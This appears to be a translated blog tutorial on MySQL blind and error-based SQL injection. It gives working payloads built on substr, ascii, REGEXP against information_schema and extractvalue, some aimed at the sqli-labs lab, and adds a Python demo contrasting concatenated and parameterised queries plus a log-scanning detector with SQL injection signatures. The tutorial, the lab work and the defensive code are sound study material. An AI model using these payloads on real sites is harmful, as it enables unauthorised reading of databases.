SQL blind injection functions

1. Boolean-based blind SQL injection: constructing a truth-value judgment
Three substring (truncation) functions
The MID() function
MID(database(),1,1)>'a'   checks the first character of the database name
MID(column_name,start,[length])
Note: length is optional and defaults to the rest of the string.

The SUBSTR() function
SUBSTR() and SUBSTRING() do the same thing: both cut a substring out of a string.
substr(database(),1,1)>'a'   checks the first character of the database name; start is the starting position and length is the number of characters taken.

The LEFT() function
returns the specified number of characters from the left of the string: left(string,n), where string is the string to be cut and n is the length.
left(database(),2)>'ab'   checks the first 2 characters of the database name

We also need the ORD() function, which returns the ASCII code of the first character of its argument; it is usually combined with the functions above.
For example: ORD(MID(DATABASE(),1,1))>114

Regular expression attack
In MySQL 5+ all database names, table names and column names are stored in the information_schema database, so the attack proceeds as follows:

1. Determine whether the first character of the first table name is in a-z; here blind_sqli is the assumed database name.
Note: the ^ in the regular expression anchors the match to the start of the string, so '^[a-z]' means the first character is in a-z.
index.php?id=1 and 1=(select 1 from information_schema.tables where table_schema='blind_sqli' AND table_name REGEXP '^[a-z]' limit 0,1)

2. Determine whether the first character is in a-n; if not, it is in o-z.

index.php?id=1 and 1=(select 1 from information_schema.tables where table_schema='blind_sqli' AND table_name REGEXP '^[a-n]' limit 0,1)

Then keep narrowing the expression in the same way. For a table named news the sequence looks like this:
^[a-z] -> ^n[a-z] -> ^ne[a-z] -> ^new[a-z] -> ^news[a-z] -> FALSE
Once the expression returns FALSE the name is complete; then do the same for the other tables.

Experiments show that with the above expression, even under limit 0,1, REGEXP matches every table in the security database, including email and users. In fact, limit 0,1 applies to the result of where table_schema='security', and since table_schema='security' already restricts the rows, it makes no difference whether limit is present or not.


less-5 blind injection

Get the first character of the first table in the security database:
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))%3E108-- +

Using this as the template, repeat for the following positions, one character at a time:
substr( ,2,1);
substr( ,3,1);

Tips:
ASCII values:
a-z: 97-122
A-Z: 65-90
0-9: 48-57
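As an added example (not code from the original post): the same truth-value probe the page builds with substr() and ascii(), run against a constructed SQLite database that stands in for the sqli-labs security schema, once through a query assembled by string concatenation (the index.php?id= pattern on this page) and once through a bound parameter. SQLite's unicode() plays the role of MySQL's ascii(); the table, its rows and the probe thresholds are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the sqli-labs 'security' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "Dumb"), (2, "Angelina")])
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable: the request parameter is spliced into the SQL text, so a
    boolean condition appended to it becomes part of the WHERE clause."""
    sql = "SELECT username FROM users WHERE id=" + user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, user_id):
    """Hardened: the parameter is bound, so the whole request value is compared
    against id as a single value and is never parsed as SQL."""
    rows = conn.execute("SELECT username FROM users WHERE id=?", (user_id,))
    return [row[0] for row in rows]


# Boolean probe in the page's style: compare the code of the first character of
# the first username (here 'D' = 68) against a threshold. SQLite's unicode()
# stands in for MySQL's ascii(); the page's "limit 0,1" syntax works unchanged.
PROBE = "1 and unicode(substr((select username from users limit 0,1),1,1))>{}"


def demo():
    conn = make_db()
    return {
        # 68 > 67 is true, so the concatenated query still returns the row
        "concat_true": lookup_concat(conn, PROBE.format(67)),
        # 68 > 68 is false, so the row disappears: one bit of data has leaked
        "concat_false": lookup_concat(conn, PROBE.format(68)),
        # Bound parameter: the probe text is compared against id as a value;
        # it is not an integer, so no row matches and nothing is revealed
        "param_probe": lookup_param(conn, PROBE.format(67)),
        # The legitimate value still works through the bound parameter
        "param_plain": lookup_param(conn, "1"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:13s} -> {rows}")
```

The two concatenated calls differ only in the threshold, yet one returns the row and the other does not; that difference is the entire channel a Boolean-blind probe reads. With the bound parameter the same text yields no row regardless of the threshold, because the driver never lets the comparison reach the SQL parser.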

Error-based injection

uname=admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#

'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1
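As an added example (not part of the original post), detection logic covering both the Boolean-blind probes described above (MID/SUBSTR/LEFT combined with ORD/ASCII, and REGEXP against information_schema) and the error-based extractvalue payloads in this section, run over a few constructed access-log lines. The log format, client addresses and the signature set are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# One pattern per probe family discussed on the page. They are applied to the
# URL-decoded request so that %3E, %22 and '+' do not hide the keywords.
SIGNATURES = {
    "char-extract": re.compile(r"\b(?:mid|substr|substring|left)\s*\(", re.I),
    "char-to-int": re.compile(r"\b(?:ord|ascii)\s*\(", re.I),
    "schema-read": re.compile(
        r"information_schema\.(?:tables|columns|schemata)"
        r"|\bdatabase\s*\(\s*\)|@@version", re.I),
    "regexp-probe": re.compile(r"\bregexp\s+'\^?\[", re.I),
    "error-based": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
}

# Constructed access-log lines (client, method, request, status). Lines 2-4
# carry probes in the style of this page; line 5 is a benign request that
# contains the word "left" but no function call.
SAMPLE_LOG = [
    "10.0.0.5 GET /index.php?id=1 200",
    "10.0.0.5 GET /index.php?id=1'+and+ascii(substr((select+table_name+from"
    "+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))"
    "%3E108--+ 200",
    "10.0.0.7 GET /index.php?id=1+and+1=(select+1+from+information_schema.tables"
    "+where+table_schema='blind_sqli'+AND+table_name+REGEXP+'^[a-n]'+limit+0,1) 200",
    "10.0.0.9 POST /login.php?uname=admin%22+and+extractvalue(1,concat(0x7e,"
    "(select+@@version),0x7e))%23 200",
    "10.0.0.5 GET /search.php?q=left+handed+mouse 200",
]


def classify(request):
    """Return the sorted list of signature tags matched by one request."""
    decoded = unquote_plus(request)
    return sorted(tag for tag, rx in SIGNATURES.items() if rx.search(decoded))


def is_suspicious(tags):
    """A lone substring function in a parameter is common in normal traffic;
    flag only the combinations that make sense when reading the catalogue."""
    return ("error-based" in tags or "regexp-probe" in tags
            or ("char-extract" in tags and "schema-read" in tags))


def scan(lines):
    """Map the index of each suspicious log line to its matched tags."""
    hits = {}
    for i, line in enumerate(lines):
        request = line.split()[2]
        tags = classify(request)
        if is_suspicious(tags):
            hits[i] = tags
    return hits


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_LOG).items():
        print(f"line {i}: {', '.join(tags)}")
```

Decoding before matching matters: the page's own payload writes > as %3E and the double quote as %22, and a match on the raw line would miss keywords split by '+'. The combination rule keeps a single left( or substr( in an ordinary parameter from raising an alert while still catching every request that touches information_schema or the XML error functions.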



Source: blog.csdn.net/qq_42812036/article/details/100525404